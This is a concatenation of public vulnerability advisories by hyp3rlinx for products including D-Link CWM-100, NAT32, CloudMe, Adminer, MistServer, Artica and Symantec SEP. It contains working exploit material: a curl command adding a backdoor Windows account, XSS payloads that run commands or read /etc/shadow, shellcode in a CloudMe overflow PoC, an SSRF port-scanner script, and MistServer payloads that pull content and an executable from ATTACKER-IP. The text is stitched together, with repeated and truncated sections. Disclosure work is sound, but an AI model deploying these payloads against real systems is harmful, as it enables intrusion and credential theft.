Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

D-LINK Central WifiManager CWM-100 FTP Server PORT Bounce Scan CVE-2018-15516

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***


[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
FTP Server PORT Bounce Scan


[CVE Reference]
CVE-2018-15516


[Security Issue]
The FTP Server component of the D-LINK Central WifiManager can be used as a 
man-in-the-middle machine allowing PORT Command bounce scan attacks.
This vulnerability allows remote attackers to abuse your network and discreetly 
conduct network port scanning. Victims will then think these
scans are originating from the D-LINK network running the afflicted FTP Server 
and not you.


[Exploit/POC]
D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are 
"admin" "admin"

nmap -v -b admin:admin@VICTIM-IP:9000   -p 21,22,23,53,445


[POC Video URL]
https://vimeo.com/299797225


[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)

[apparitionsec]

[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security

[-_-] D1rty0tis
 

Vendor:
=
www.nat32.com


Product:
=
NAT32 Build (22284)


NAT32 is a versatile IP Router implemented as a WIN32 application.


Vulnerability Type:
===
Remote Command Execution 


CVE Reference:
==
CVE-2018-6940


Security Issue:

NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
  TCP0.0.0.0:8080   0.0.0.0:0  LISTENING   3720


If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user 
must select it under config tab) then remote attackers who can reach
NAT32 can potentially execute arbitrary commands, if authentication is enabled 
they will get 'Unauthorized' server reply, however, read on ...

e.g.

Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


run start net user D1rty0Tis abc123 /add Done



If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL 
potentially issue arbitrary commands exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated 
NAT32 users click a malicious link
or visit an attacker controlled webpage. 

Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 
Encoded credentials which can be easily
revealed if sniffed on network.

When 'Password Checking' is enabled attackers using Ajax calls via XSS would 
need to use a combination of '%0D%0A' and double encoding
to deal with 'white-space' in order for the payload to stay intact.

%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, 
however '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting Command 'EXECR' that can allow attackers to capture 
Command output response from the server to see right away if an
attack was success or not.

e.g.

Add account and get response (EXECR)

HTTP Response:


The command completed successfully.

execr net user D1rty0Tis abc123 /add Done



The NAT32 'winroute' Command will return host route information.

XSS response

e.g.



DestinationMask  Nexthop  Metric IfIndex Type 
Proto Age
0.0.0.0 0.0.0.0 192.168.1.210   b4 3 21:41 
[min:sec]
127.0.0.0   255.0.0.0   127.0.0.1  306  13 3 22:04 
[min:sec]
127.0.0.1   255.255.255.255 127.0.0.1  306  13 3 22:04 
[min:sec]
127.255.255.255 255.255.255.255 127.0.0.1  306  13 3 22:04 
[min:sec]



Exploit/POC:
=
NET32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


NAT32 BASIC authentication enabled use XSS...

Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);

Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E



Network Access:
===
Remote


Severity:
=
High


Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : 
February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily 
unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow (hyp3rlinx / apparition security)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security  
[+] SSD Beyond Security Submission: 
https://blogs.securiteam.com/index.php/archives/3669


Vendor:
=
www.cloudme.com


Product:
===
CloudMe Sync <= v1.10.9

(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0 

CloudMe is a file storage service operated by CloudMe AB that offers cloud 
storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, 
all files are synchronized between devices.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
CVE-2018-6892



Security Issue:

Unauthenticated remote attackers that can connect to the "CloudMe Sync" client 
application listening on port , can send a malicious payload causing
a Buffer Overflow condition. This will result in an attacker controlling the 
programs execution flow and allowing arbitrary code execution on the victims PC.

CloudMe Sync client creates a socket listening on TCP Port  (0x22B8)

In Qt5Core:

00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<_ZN10QTc>;  
Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst


C:\>netstat -ano | findstr 
TCP0.0.0.0:   0.0.0.0:0  LISTENING   15504
TCP[::]:  [::]:0 LISTENING   15504


Buffer Overflow:

EIP register will be overwritten at about 1075 bytes.

EAX 0001
ECX 76F698DA msvcrt.76F698DA
EDX 0035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
==

(508.524): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
ntdll.dll - 
eax= ebx= ecx=41414141 edx=778f353d esi= edi=
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
41414141 ??  ???

Exploitation is very easy as ASLR SafeSEH are all set to false making the 
exploit portable and able to work across different operating systems.
We will therefore use Structured Exceptional Handler overwrite for our exploit.

e.g.

6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull 
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, 
OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)


0day Exploit POC:
==
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ') 

nseh="\xEB\x06"+"\x90"*2#JMP
seh=struct.pack('

Oracle JDeveloper IDE Directory Traversal CVE-2017-10273 (hyp3rlinx / apparition security)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt
[+] ISR: apparition security   
 

Vendor:
=
www.oracle.com


Product:
===
JDeveloper IDE

Oracle JDeveloper is a free integrated development environment that simplifies 
the development of Java-based
applications addressing every step of the application lifecycle.



Vulnerability Type:
===
Directory Traversal



CVE Reference:
==
CVE-2017-10273



Security Issue:

Attackers can place malicious files outside intended target directories if 
tricked into importing corrupt .WAR or .EAR archives.
Later, attackers can potentially request these scripts/files to execute system 
commands on affected target.


Affected versions:
11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0


References:

http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html



Exploit/POC:
=
1) create evil .WAR or .EAR archive containing ../ in path name to initiate 
directory traversal and inside a script to execute system commands.
2) import into JDeveloper
3) files get moved outside target directories to one of the attackers choosing.
4) attacker requests the malicious file contained in target directory.

BAM!


Network Access:
===
Local



Severity:
=
Low



Disclosure Timeline:
=
Vendor Notification: October 14, 2016
Vendor fixes as part of CPU January 16, 2018
January 17, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Adminer <= v4.3.1 Server Side Request Forgery

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security   
 


Vendor:
==
www.adminer.org


Product:

Adminer <= v4.3.1 

Adminer (formerly phpMinAdmin) is a full-featured database management tool 
written in PHP. Conversely to phpMyAdmin, it consist of a
single file ready to deploy to the target server. Adminer is available for 
MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch 
and MongoDB.

https://github.com/vrana/adminer/releases/


Vulnerability Type:
===
Server Side Request Forgery


CVE Reference:
==
N/A


Security Issue:

Adminer allows unauthenticated connections to be initiated to arbitrary 
systems/ports. This vulnerability can be used to potentially bypass firewalls to
identify internal hosts and perform port scanning of other servers for 
reconnaissance purposes. Funny thing is Adminer throttles invalid login attempts
but allows endless unauthorized HTTP connections to other systems as long as 
your not trying to authenticate to Adminer itself.

Situations where Adminer can talk to a server that we are not allowed to (ACL) 
and where we can talk to the server hosting Adminer, it can do recon for us.

Recently in LAN I was firewalled off from a server, however another server 
running Adminer I can talk to. Also, that Adminer server can talk to the target.
Since Adminer suffers from Server-Side Request Forgery, I can scan for open 
ports and gather information from that firewalled off protected server.
This allowed me to not only bypass the ACL but also hide from the threat 
detection system (IDS) monitoring east west connections. 

However, sysadmins who check the logs on the server hosting Adminer application 
will see our port scans.

root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET 
///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET 
///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET 
///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-"


Details:
==
By comparing different failed error responses from Adminer when making SSRF 
bogus connections, I figured out which ports are open/closed.

Port open ==> Lost connection to MySQL server at 'reading initial communication 
packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor 
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine actively 
refused it
Port closed ==> A connection attempt failed. 

This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof 
of concept that leverages Adminer SSRF vulnerability.


PortMiner observations:
==
No response 'read operation timed out' means the port is possibly open or 
filtered and should be given a closer look if possible. This seems to occur 
when scanning
Web server ports like 80, 443. However, when we get error responses like the 
ones above from the server we can be fairly certain a port is either 
open/closed. 

Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p 
Use range -


Exploit/POC:
=
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name 
from os import system as system_call

#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org 
#=
#D1rty0Tis says hi.

#timeout
MAX_TIME=32
#ports to log
port_lst=[]  
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443'] 

BANNER='''
   _   __  __ _  
  |  _  \ | | |  \/  (_) 
  | |__) |__  _ __| |_| \  / |_ _ __   ___ _ __  
  |  ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| 
  | |  | (_) | |  | |_| |  | | | | | |  __/ |
  |_|   \___/|_|   \__|_|  |_|_|_| |_|\___|_|   

  
   '''   
   

def info():
print "\nPortMiner depends on Error messages to determine open/closed 
ports."
print "Read operations reported 'timed out' may be open/filtered.\n"


def greet():
print 'Adminer Unauthenticated SSRF Port Scanner Tool'
print 'Targets Adminer used for MySQL administration\n'
print 'by hyp3rlinx - apparition security'
print '

CVE-2017-16884 Mist Server v2.12 Unauthenticated Persistent XSS (hyp3rlinx / ApparitionSec)

[apparitionsec]

[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec
 


Vendor:
=
mistserver.org



Product:
===
MistServer v2.12


MistServer is a full-featured, next-generation streaming media toolkit for OTT 
(internet streaming).



Vulnerability Type:
===
Unauthenticated Persistent XSS



CVE Reference:
==
CVE-2017-16884



Security Issue:

Unauthenticated remote attackers can inject persistent XSS payloads by making 
failed HTTP authentication requests. Attacker supplied payloads will
get stored in the server logs as failed authentication requests alerts. 
Mistserver echoes back the unsanitized payloads in Mist Servers Web interface
automatically due to automatic refresh of the UI every few seconds, thereby, 
executing arbitrary attacker supplied code. 



References:

https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21



Exploit/POC:
=
import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}')



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE-2017-17055 Artica Web Proxy v3.06 Remote Code Execution (hyp3rlinx / ApparitionSec)

[apparitionsec]

[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.articatech.com



Product:
=
Artica Web Proxy v.3.06.112216 


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and 
Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been 
developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both 
their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===
Remote Code Execution 



CVE Reference:
==
CVE-2017-17055



Security Issue:

Artica offers a web based command line emulator 'system.terminal.php' (shell), 
allowing authenticated users to execute OS commands as root. 
However, artica fails to sanitize the following HTTP request parameter 
$_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, authenticated users who click an attacker supplied link or visit a 
malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating 
System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of 
the artica server.



Exploit/POC:
=
1) Steal artica Server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E


Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: November 28, 2017  
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Abyss Web Server < v2.11.6 Memory Heap Corruption (hyp3rlinx / apparitionsec)

[apparitionsec]

[+] Credits: John Page (aka HyP3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
aprelium.com



Product:
===
Abyss Web Server < v2.11.6



Vulnerability Type:
===
Memory Heap Corruption



CVE Reference:
==
N/A



Security Issue:

Possible to corrupt heap memory of the Abyss Web Server by sending specially 
crafted HTML in repeated HTTP POST requests.
Users should upgrade to latest version v2.11.6.


GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP: 
msvcrt!memcpy+5a
75e49b60 f3a5rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:   -- (.exr 0x)
ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x005a)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags: 
NumberParameters: 2
   Parameter[0]: 
   Parameter[1]: 003b9000
Attempt to read from address 003b9000

CONTEXT:   -- (.cxr 0x0;r)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404  add esp,4

PROCESS_NAME:  abyssws.exe

ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced 
memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%08lx referenced 
memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  

EXCEPTION_PARAMETER2:  003b9000

READ_ADDRESS:  003b9000 

FOLLOWUP_IP: 
abyssws+413d9
004413d9 59  pop ecx

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

APP:  abyssws.exe

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre

LAST_CONTROL_TRANSFER:  from 0043f840 to 75e49b60

FAULTING_THREAD:  

BUGCHECK_STR:  
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE

PRIMARY_PROBLEM_CLASS:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

DEFAULT_BUCKET_ID:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

STACK_TEXT:  
777542a8 776cd9bc ntdll!RtlFreeHeap+0x64
777542ac 75e498cd msvcrt!free+0xcd
777542b0 004413d9 abyssws+0x413d9
777542b4 004089d0 abyssws+0x89d0
777542b8 0040a607 abyssws+0xa607
777542bc 0040bd58 abyssws+0xbd58
777542c0 0040cb5b abyssws+0xcb5b


SYMBOL_STACK_INDEX:  2

SYMBOL_NAME:  abyssws+413d9

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: abyssws

IMAGE_NAME:  abyssws.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  5807a3cb

STACK_COMMAND:  dps 777542a8 ; kb

FAILURE_BUCKET_ID:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c005_abyssws.exe!Unknown

BUCKET_ID:  
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  
um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c005_abyssws.exe!unknown

FAILURE_ID_HASH:  {0ba3122b-4351-5a85-a0ea-294a6ce77042}

Followup: MachineOwner
-


///


The stored exception information can be accessed via .ecxr.
(2740.30b8): Access violation - code c005 (first/second chance not 
available)
eax= ebx=075c33f8 ecx=000efd46 edx=0002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404  add esp,4
0:011> !load winext/msec
0:011> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block 
Data Move starting at msvcrt!memcpy+0x0250 
(Hash=0xb1db8cd3.0x508907b2)

This is a read access violation in a block data move, and is therefore 
classified as probably exploitable.

?

References:

https://aprelium.com/news/abws2-11-6.html



Exploit/POC:
=
Cause Heap Corruption in Abyss Server.





//Abyss Web Server Memory (heap) Corruption POC
//Discover by hyp3rlinx
//Error code: 0xc374 is STATUS_HEAP_CORRUPTION
//0xc374 - heap has been corrupted.
//===
window.onerror=function(){
return true
}



var target='<a  rel="nofollow" href="http://VICTIM-IP:/hosts/host@0/edit/ipcontrol">http://VICTIM-IP:/hosts/host@0/edit/ipcontrol</a>';

function mk_iframe_targets(f){
var tmp = document.createElement('IFRAME')
tmp.style='display:none'
tmp.name='hidden-frame'+f
return tmp
}

function mk_inputs(id,na

Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331 (hyp3rlinx)

[apparitionsec]

[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.symantec.com



Product:
===
Symantec Endpoint Protection
v12.1.6 (12.1 RU6 MP5) 
Symantec 12.1.7004.6500 



Vulnerability Type:
===
Tamper-Protection Bypass
Denial Of Service / Message Spoof



CVE Reference:
==
CVE-2017-6331
SSG16-041



Security Issue:

Symantec Endpoint Protection (SEP), does not validate where WinAPI messages 
comes from (lack of UIPI).
Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to 
close
the SEP UI denying end user ability to scan / run the EP AntiVirus protection. 
Spoofed messages could
also potentially inform a user a scan was clean.

Unfortunately Symantecs advisory left out details of the Denial Of Service as 
well as minimizing the
amount of text a malware could inject into the UI which would result in 
compromising the integrity of the
Symantec Endpoint Protection Control Panel user interface. 


References:
===
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00
 


Exploit/POC:
= 

1) Compile below C program, it targets various components of SEP, comment out 
what you want to send to the UI.

2) Try to open the Symantec Endpoint UI and you will be denied.
3) Or inject attacker supplied messages intructing the user the file is clean 
etc.


#include 
#include 
#define VICTIM "DevViewer.exe"

//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 
12.1.7004.6500 Windows 7 
